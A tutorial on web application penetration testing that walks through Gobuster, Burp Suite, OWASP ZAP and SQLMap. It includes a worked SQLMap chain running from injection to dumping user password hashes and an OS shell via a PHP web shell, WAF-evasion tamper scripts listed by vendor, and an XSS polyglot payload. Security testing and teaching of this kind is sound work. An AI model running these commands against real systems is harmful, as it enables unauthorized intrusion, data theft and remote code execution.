Web Application Testing with Specialized Toolkits
Mapping the Attack Surface: Reconnaissance and Content Discovery
Before injecting payloads or manipulating sessions, effective web application testing demands systematic reconnaissance. The OWASP Testing Guide v4 structures this across information gathering, configuration management, and identity management—phases where specialized tools prove indispensable.
Gobuster and dirb remain foundational for content discovery, each optimized for distinct scenarios. Gobuster leverages Go's concurrency model to achieve substantially higher throughput:
# Directory enumeration with wordlist and extensions
gobuster dir -u https://target.example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,aspx,html,bak,txt -t 50
# Virtual host discovery for shared hosting environments
gobuster vhost -u https://target.example.com -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt
The -k flag bypasses certificate validation for internal environments, while --wildcard handling prevents false positives from catch-all responses. For APIs and modern JavaScript-heavy applications, combine with ffuf for fuzzing parameters and routes discovered through source map analysis.
Dirb excels when recursive enumeration matters—following redirects through authentication realms or parsing robots.txt and sitemap.xml automatically. Its built-in authentication cookie support (-c flag) maintains session state through protected areas that Gobuster might otherwise miss.
Intercepting and Manipulating Traffic: The Burp Suite Professional Workflow
Burp Suite Professional serves as the central nervous system of web application testing, with four modules forming the core workflow: Spider, Scanner, Intruder, and Repeater.
Spider systematically crawls applications, mapping attack surface by following links, submitting forms, and parsing JavaScript. Modern applications require configured login macros—recorded sequences that handle anti-CSRF tokens, CAPTCHA challenges, or multi-step authentication. Configure these under Project Options → Sessions → Macros, then bind to specific URL scope for continuous authenticated crawling.
Scanner provides both passive and active analysis. Passive scanning analyzes all proxy traffic without additional requests, identifying cleartext password fields, missing security headers, and information disclosure in responses. Active scanning sends tailored payloads, but requires discretion:
- Light active scan: Header manipulation, basic payload insertion
- Medium active scan: Time-based detection, nested encoding
- Intensive active scan: File path manipulation, out-of-band interaction (requires Burp Collaborator)
Intruder enables customized automated attacks across four payload positions. The Sniper mode single-points each position sequentially; Battering ram applies identical payloads across all positions simultaneously; Pitchfork iterates multiple payload lists in parallel (ideal for credential stuffing); Cluster bomb generates Cartesian products for comprehensive brute-force scenarios.
Repeater facilitates manual refinement—tweaking individual requests, observing nuanced responses, and building proof-of-concept exploits. The Render tab visualizes HTML responses, while the Hex editor manipulates binary payloads for deserialization attacks.
Burp's extensibility transforms it from scanner to comprehensive testing platform. Critical extensions include:
| Extension | Function | Installation |
|---|---|---|
| Autorize | Automated privilege escalation detection | BApp Store |
| Logger++ | Forensic-grade request/response logging with advanced filtering | BApp Store |
| Turbo Intruder | High-performance HTTP attacks using Python scripts | BApp Store |
| Param Miner | Hidden parameter discovery via cache-bust timing | BApp Store |
Autorize operates by intercepting requests, stripping session tokens to create "unauthenticated" and "low-privileged" variants, then comparing responses against the original. Configure it by setting the "unauthorized request" replacement pattern—typically Cookie: session=INVALID—then browse the application normally. Autorize flags endpoints returning identical content across privilege levels, immediately surfacing IDOR vulnerabilities and missing authorization checks.
Logger++ supersedes Burp's native logging with regex-based filtering, JSON export, and Elasticsearch integration. For forensic reconstruction of complex multi-step attacks, its query syntax (Request.Method = POST AND Response.StatusCode = 302) enables precise event correlation.
Automated Vulnerability Detection: OWASP ZAP in Pipeline Context
OWASP ZAP complements Burp through superior automation and CI/CD integration. Its Ajax Spider handles single-page applications where traditional crawlers fail, executing JavaScript to render DOM-dependent navigation.
For pipeline integration, ZAP's packaged scans execute via Docker:
# Baseline scan: passive analysis of spider results, non-intrusive
docker run -t ghcr.io/zaproxy/zaproxy:stable zap-baseline.py \
-t https://target.example.com \
-r zap-report.html \
--hook=/zap/wrk/custom-hooks.py
# Full scan: active attack with policy configuration
docker run -v $(pwd):/zap/wrk/:rw -t ghcr.io/zaproxy/zaproxy:stable zap-full-scan.py \
-t https://target.example.com \
-g gen.conf \
-x zap-report.xml
The Automation Framework (YAML-based) enables version-controlled scan configurations:
env:
contexts:
- name: "Target Context"
urls:
- "https://api.target.example.com"
authentication:
method: "json"
parameters:
loginUrl: "https://api.target.example.com/auth/login"
loginRequestBody: '{"username":"{{username}}","password":"{{password}}"}'
jobs:
- type: spider
parameters:
maxDepth: 5
- type: activeScan
parameters:
policy: "API-Minimal"
ZAP's scripting capabilities support Python, JavaScript, and Groovy for custom scan rules. The OAST (Out-of-band Application Security Testing) add-on integrates with interactsh or Burp Collaborator for detection of blind vulnerabilities—SSRF, blind XSS, and command injection where no immediate response indicates success.
Database Compromise: SQLMap Detection and Evasion
SQLMap remains the definitive tool for SQL injection automation, but effective deployment requires understanding its detection hierarchy and evasion mechanisms.
Detection levels escalate through --level (1-5, default 1) and --risk (1-3, default 1):
- Level 1: Basic error-based and UNION-based tests
- Level 2: Time-based blind detection, HTTP Cookie testing
- Level 3: OR-based WHERE clause injections, stacked queries
- Levels 4-5: Boundary-condition fuzzing, exotic injection points (User-Agent, Referer, X-Forwarded-For)
Risk parameters determine payload aggressiveness—risk 3 enables heavy table destruction (DROP, ALTER) and OS shell attempts.
Worked Example: Login Portal to OS Shell
Consider a login portal at https://legacy.target.example.com/login.php with parameters username and password. Initial reconnaissance reveals MySQL error messages on malformed input.
Phase 1: Error-based Detection
sqlmap -u "https://legacy.target.example.com/login.php" \
--data="username=test&password=test" \
--level=2 --risk=1 \
--batch
Expected output identifies the injection point:
Parameter: username (POST)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=test' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71767a7671,(SELECT (ELT(2153=2153,1))),0x71767a7671,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'jSLE'='jSLE&password=test
Phase 2: Database Fingerprinting and Enumeration
sqlmap -u "https://legacy.target.example.com/login.php" \
--data="username=test&password=test" \
--banner --current-user --current-db \
--dbs --tables -D application_db
Output confirms MySQL 5.7.38, user app_user@localhost, database application_db, and reveals tables including users, sessions, api_keys.
Phase 3: UNION-based Data Extraction
sqlmap -u "https://legacy.target.example.com/login.php" \
--data="username=test&password=test" \
-D application_db -T users -C username,password_hash,email \
--dump --threads=4
SQLMap automatically determines column count and suitable data types for UNION injection, dumping cracked hashes via integrated dictionary attacks.
Phase 4: os-shell Access
sqlmap -u "https://legacy.target.example.com/login.php" \
--data="username=test&password=test" \
--os-shell
This requires stacked query support (MySQL with certain configurations) or UNION-based file write capabilities. SQLMap attempts to write a PHP shell to the webroot using INTO OUTFILE or --file-write techniques, then invokes it for interactive command execution.
When manual intervention proves superior: boolean-based blind injection with non-standard responses, NoSQL injection (MongoDB, CouchDB), second-order injection where payload storage and execution are decoupled, and ORACLE database exploitation with restricted UTL_FILE permissions.
WAF Evasion and Tamper Scripts
Modern defenses—Cloudflare, Akamai, AWS WAF, and custom rule sets—necessitate tamper script composition. SQLMap's --tamper option chains multiple scripts:
sqlmap -u "https://protected.target.example.com/api/search" \
--data="query=test" \
--tamper=space2comment,between,charencode \
--random-agent --delay=2 --time-sec=5 \
--level=3 --risk=2
Effective tamper combinations by target:
| WAF/Defense | Tamper Strategy | Scripts |
|---|---|---|
| Cloudflare | Character encoding, case randomization | charencode, randomcase, space2comment |
| Akamai | Multibyte encoding, comment injection | multiplespaces, base64encode (custom) |
| AWS WAF | SQL keyword fragmentation | between, greatest, space2morehash |
| ModSecurity | Null byte insertion, HTTP fragmentation | nullbyte, apostrophenullencode |
For custom WAFs, identify blocking behavior through systematic fuzzing: send baseline requests, iterate payload components, and analyze 403/406/500 response patterns. Build bespoke tampers when generic scripts fail.
Client-Side Attack Surface: XSS, CSRF, and DOM Manipulation
Client-side testing addresses the remaining OWASP categories. Reflected XSS validates through immediate payload reflection; Stored XSS requires multi-step verification across user sessions; DOM-based XSS demands JavaScript execution flow analysis.
Burp's DOM Invader extension traces source-to-sink propagation automatically. For manual verification:
// Standard polyglot for context detection
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
CSRF testing validates token entropy, SameSite cookie enforcement, and cross-origin submission viability. Burp's CSRF PoC generator (right-click request → Engagement Tools → Generate CSRF PoC) produces proof-of-concept HTML. For applications employing double-submit cookies, verify synchronization between cookie and parameter tokens.
Modern frameworks implement Content Security Policy (CSP) and Trusted Types as mitigation layers. Bypass assessment requires script-src 'unsafe-eval' presence for Angular sandbox escape, or strict-dynamic with nonce-based delegation chains that might be poisoned through markup injection in JSON responses.
The comprehensive tester alternates between automated scanning for coverage and manual manipulation for depth—recognizing that tool output represents hypotheses requiring validation, never conclusions.